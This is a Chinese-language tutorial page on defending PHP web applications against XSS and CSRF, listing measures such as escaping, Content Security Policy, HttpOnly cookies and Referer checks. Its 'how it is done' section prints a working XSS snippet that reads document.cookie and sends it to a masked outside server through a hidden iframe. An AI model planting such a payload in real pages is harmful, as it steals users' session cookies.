首页 / PHP / XSS和CSRF攻击怎么防护

XSS和CSRF攻击怎么防护

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了XSS和CSRF攻击怎么防护，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含2106字，纯文字阅读大概需要4分钟。

内容图文

XSS：跨站脚本（Cross-site scripting，通常简称为XSS）是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。

CSRF:跨站请求伪造（英语：Cross-site request forgery），也被称为 one-click attack 或者 session riding，通常缩写为 CSRF 或者 XSRF，是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。

简单理解就是：

XSS：通过客户端脚本语言（最常见如：JavaScript）
在一个论坛发帖中发布一段恶意的JavaScript代码就是脚本注入，如果这个代码内容有请求外部服务器，那么就叫做XSS！

CSRF：又称XSRF，冒充用户发起请求（在用户不知情的情况下）,完成一些违背用户意愿的请求（如恶意发帖，删帖，改密码，发邮件等）。

怎么做

// 用 <script type="text/javascript"></script> 包起来放在评论中
(function(window, document) {
    // 构造泄露信息用的 URL
    var cookies = document.cookie;
    var xssURIBase = "http://********";
    var xssURI = xssURIBase + window.encodeURI(cookies);
    // 建立隐藏 iframe 用于通讯
    var hideFrame = document.createElement("iframe");
    hideFrame.height = 0;
    hideFrame.width = 0;
    hideFrame.style.display = "none";
    hideFrame.src = xssURI;
    // 开工
    document.body.appendChild(hideFrame);
})(window, document);

如何防护

中心思想：一切的一切外部来源数据，都要我们服务端代码的过滤，才能让他展示到页面上，也就是说，一切外部数据都是非法的，一定要做好过滤。

1.尽量使用innerText(IE)和textContent(Firefox),也就是jQuery的text()来输出文本内容
2.必须要用innerHTML等等函数，则需要做类似php的htmlspecialchars的过滤

3.在输出html时，加上Content Security Policy的Http Header
（作用：可以防止页面被XSS攻击时，嵌入第三方的脚本文件等）
（缺陷：IE或低版本的浏览器可能不支持）
4.在设置Cookie时，加上HttpOnly参数
（作用：可以防止页面被XSS攻击时，Cookie信息被盗取，可兼容至IE6）
（缺陷：网站本身的JS代码也无法操作Cookie，而且作用有限，只能保证Cookie的安全）
5.在开发API时，检验请求的Referer参数
（作用：可以在一定程度上防止CSRF攻击）
（缺陷：IE或低版本的浏览器中，Referer参数可以被伪造）

内容总结

以上是互联网集市为您收集整理的XSS和CSRF攻击怎么防护全部内容，希望文章能够帮你解决XSS和CSRF攻击怎么防护所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/138887.html

来源：【匿名】

【上一篇】PHP一次写入百万条测试数据的方法【下一篇】PHP 5 数据对象 (PDO) 抽象层与 Oracle

更多 ►

【XSS和CSRF攻击怎么防护】教程文章相关的互联网学习教程文章

PHP程序的常见漏洞攻击分析

随着PHP的广泛运用，一些黑客们也在无时不想找PHP的麻烦，通过PHP程序漏洞进行攻击就是其中一种。在节，我们将从全局变量，远程文件，文件上载，库文件，Session文件，数据类型和容易出错的函数这几个方面分析了PHP的安全性。如何通过全局变量进行攻击？PHP中的变量不需要事先声明，它们会在第一次使用时自动创建，它们的类型根据上下文环境自动确定。从程序员的角度来看，这无疑是一种极其方便的处理方法。一旦一个变量被创建了，...

PHP TP5 XSS攻击

1.什么是XSS攻击　　跨站脚本攻击(Cross Site Scripting)，攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。2.转化思想防范xss攻击　　修改application/config.php　　注：在框架配置文件中，配置的函数名称，如果写错，页面不会报错，只是所有接收的数据都是null.‘default_filter‘ => ‘htmlspecialchars‘,3.过滤思想防范xss攻击　　（1）使用co...

PHP防SQL注入攻击

PHP防SQL注入攻击收藏没有太多的过滤，主要是针对php和mysql的组合。一般性的防注入，只要使用php的 addslashes 函数就可以了。以下是一段copy来的代码：PHP代码$_POST = sql_injection($_POST); $_GET = sql_injection($_GET); function sql_injection($content) { if (!get_magic_quotes_gpc()) { if (is_array($content)) { foreach ($content as $key=>$value) { $content[$key] = addslashes($value); } } else { ...

PHP防止注入攻击实例分析

本文以实例形式详细分析了PHP防止注入攻击的方法。分享给大家供大家参考。具体分析如下：PHP addslashes() 函数--单撇号加斜线转义PHP String 函数定义和用法addslashes() 函数在指定的预定义字符前添加反斜杠。这些预定义字符是：单引号 (‘) 双引号 (") 反斜杠 (\) NULL 语法：addslashes(string)参数描述string必需。规定要检查的字符串。提示和注释提示：该函数可用于为存储在数据库中的字符串以及数据库查询语句准备合...

[转]PHP防止SQL注入攻击

如果用户的输入不加修改就插入到SQL查询里，这个应用程序会容易受到SQL注入，就像下面这样： $unsafe_variable = $_POST[‘user_input‘]; mysql_query("INSERT INTO `table` (`column`) VALUES (‘$unsafe_variable‘)"); 这是因为用户能够输入像value‘); DROP TABLE table;--之类的代码，然后这个查询就变成了： INSERT INTO `table` (`column`) VALUES(‘value‘); DROP TABLE table;--‘) ...

freebsd6.2 nginx+php+mysql+zend系统优化防止ddos攻击

一、安装软件前的准备系统的安装：插入freebsd6.2以上的光盘，最小化安装系统，同时安装好ports二、手动安装nginx+php1) 进入系统后，准备cvs更新：1. cd /usr/ports/net/cvsup-without-gui2. cp /usr/share/examples/cvsup/ports-supfile /etc/ports-supfile3. # vi /etc/ports-supfile将其中的#*default host=CHANGE_THIS.FreeBSD.org一行改为*default host=cvsup4.FreeBSDchina.org4. 更...

PHP MYSQL注入攻击需要预防7个要点

1：数字型参数使用类似intval，floatval这样的方法强制过滤。 2：字符串型参数使用类似mysql_real_escape_string这样的方法强制过滤，而不是简单的addslashes。 3：最好抛弃mysql_query这样的拼接SQL查询方式，尽可能使用PDO的prepare绑定方式。 4：使用rewrite技术隐藏真实脚本及参数的信息，通过rewrite正则也能过滤可疑的参数。 5：关闭错误提示，不给攻击者提供敏感信息：display_errors=off。 6：以日志的方式记录错误信息：l...

使用PHP 构建的Web 应用如何避免XSS 攻击

使用PHP 构建的Web 应用如何避免XSS 攻击Web 2.0 的发展为网络用户的互动提供了更多机会。用户通过在论坛发表评论，或是在博客发表留言都可能有意或无意输入一些破坏性的内容，从而造成网页不能正常显示，影响其它用户的使用。XSS 全称为Cross Site Scripting，因为CSS 已经用作样式表的简称，故称为XSS。XSS 是一种常见的网站攻击的方法。其原理是通过在网页的输入框输入一些恶意的内容，通常是JavaScript脚本片段，而这些恶意输入...

php之文件类型解析漏洞防御与攻击

php在处理文件上传时，经常可以用到下面几种方式来判断文件的类型1.通过文件名后缀，不安全，非常容易欺骗2.通过mime判断，部分类型的文件通过修改文件后缀名，也可以欺骗服务器3.通过头字节判断文件类型，但是判断范围有限，比如docx/xlsx等新的文档，通过头信息判断时，其实是一个zip包PHP通过读取文件头部两个字节判断文件真实类型及其应用示例function checkFileType($fileName){ $file = fopen($fileName, "rb"); ...

如何对PHP程序中的常见漏洞进行攻击

来源:Chinaasp 之所以翻译这篇文章，是因为目前关于CGI安全性的文章都是拿Perl作为例子，而专门介绍ASP，PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题，原文可以在http://www.securereality.com.au/stu...arlet.txt找到。由于原文比较长，而且有相当一部分是介绍文章的背景或PHP的基础知识，没有涉及到PHP安全方面的内容，因此我没有翻译。如果你想了解这方面的知识，请参考原文。文章主...

php跨站攻击实例分析

本文实例讲述了php跨站攻击的原理与防范技巧。分享给大家供大家参考。具体方法分析如下：跨站攻击就是利用程序上的一些细节或bug问题进行的，那么我们要如何耿防止跨站攻击呢？下面就以一个防止跨站攻击例子来说明，希望对各位有帮助。复制代码代码如下:<?php #demo for prevent csrf /** * enc */ function encrypt($token_time) { return md5(‘!@##$@$$#%43‘ . $token_time); } $token_time = time(); $token = encrypt($toke...

[网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解（SQL注入、XSS攻击、文件上传漏洞）【图】

当您阅读到该篇文章时，作者已经将“网络安全自学篇”设置成了收费专栏，首先说声抱歉。感谢这一年来大家的阅读和陪伴，这100篇安全文章记录了自己从菜鸡到菜鸟的成长史，该部分知识也花了很多精力去学习和总结。由于在外读书且需要养娃，所以按最低价9.9元设置成了收费专栏，赚点奶粉钱，感谢您的抬爱。当然，如果您还是一名在读学生或经济拮据，可以私聊我给你每篇文章开白名单，也可以去github下载对应的免费文章，更希望您能进...

如何对PHP程序中的常见漏洞进行攻击

如何对PHP程序中的常见漏洞进行攻击（上）

如何对PHP程序中的常见漏洞进行攻击（上）翻译：analysist（分析家）来源：http://www.china4lert.org 如何对PHP程序中的常见漏洞进行攻击（上）原著：Shaun Clowes <http://www.securereality.com.au/> 翻译：analysist <http://www.nsfocus.com/> 之所以翻译这篇文章，是因为目前关于CGI安全性的文章都是拿Perl作为例子，而专门介绍ASP，PHP或者JSP安全性的文章则很少。Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题，...

如何对PHP程序中的常见漏洞进行攻击（下）

如何对PHP程序中的常见漏洞进行攻击（下）翻译：analysist（分析家）来源：http://www.china4lert.org 如何对PHP程序中的常见漏洞进行攻击（下）原著：Shaun Clowes <http://www.securereality.com.au/> 翻译：analysist <http://www.nsfocus.com/> [库文件] 正如我们前面讨论的那样，include()和require()主要是为了支持代码库，因为我们一般是把一些经常使用的函数放到一个独立的文件中，这个独立的文件就是代码库，当需要使用...

PHP - 技术教程分类

PHP 教程 PHP 简介 PHP 安装 PHP 语法 PHP 变量 PHP echo/print PHP EOF(heredoc) PHP 数据类型 PHP 类型比较 PHP 常量 PHP 字符串 PHP 运算符 PHP If...Else PHP Switch PHP 数组 PHP 数组排序 PHP 超级全局变量 PHP While 循环 PHP For 循环 PHP 函数 PHP 魔术常量 PHP 命名空间 PHP 面向对象 PHP 测验 PHP 表单 PHP 表单验证 PHP 表单 - 必需字段 PHP 完整表单实例 PHP $_GET 变量 PHP $_POST 变量 PHP 多维数组 PHP 日期 PHP 包含 PHP 文件 PHP 文件上传 PHP Cookie PHP Session PHP E-mail PHP Error PHP Exception PHP 过滤器 PHP 7 新特性 PHP MySQL 简介 PHP MySQL 连接 PHP MySQL 创建数据库 PHP MySQL 创建数据表 PHP MySQL 插入数据 PHP MySQL 插入多条数据 PHP MySQL 预处理语句 PHP MySQL 读取数据 PHP MySQL Where PHP MySQL Order By PHP MySQL Update PHP MySQL Delete PHP ODBC AJAX 简介 AJAX PHP AJAX 数据库 AJAX 实时搜索 AJAX 投票 PHP Array PHP Calendar PHP cURL PHP Date PHP Directory PHP Error PHP Filesystem PHP Filter PHP FTP PHP HTTP PHP Mail PHP Math PHP Misc PHP MySQLi PHP PDO PHP String PHP Zip PHP Timezones PHP 图像处理 PHP RESTful PHP PCRE PHP 可用的函数 PHP Composer php 全部

PHP - 最热教程

php如何取出数组的前几个元素 PHP变量什么时候释放 PHP如何实现在数据库随机获取几条记录如何解决php base64解码乱码 php主要用于哪些领域 Laravel 批量插入(insert)数据六款国内优秀免费wordpress主题推荐 React如何从后端获取数据并渲染到前端？纯PHP实现定时器任务（Timer），php实现...php该如何安装pdo_mysql扩展

首页 / PHP / XSS和CSRF攻击怎么防护

XSS和CSRF攻击怎么防护

内容导读

内容图文

怎么做

如何防护

内容总结

内容备注

内容手机端

【XSS和CSRF攻击怎么防护】教程文章相关的互联网学习教程文章

PHP - 技术教程分类

PHP - 最新教程

PHP - 最热教程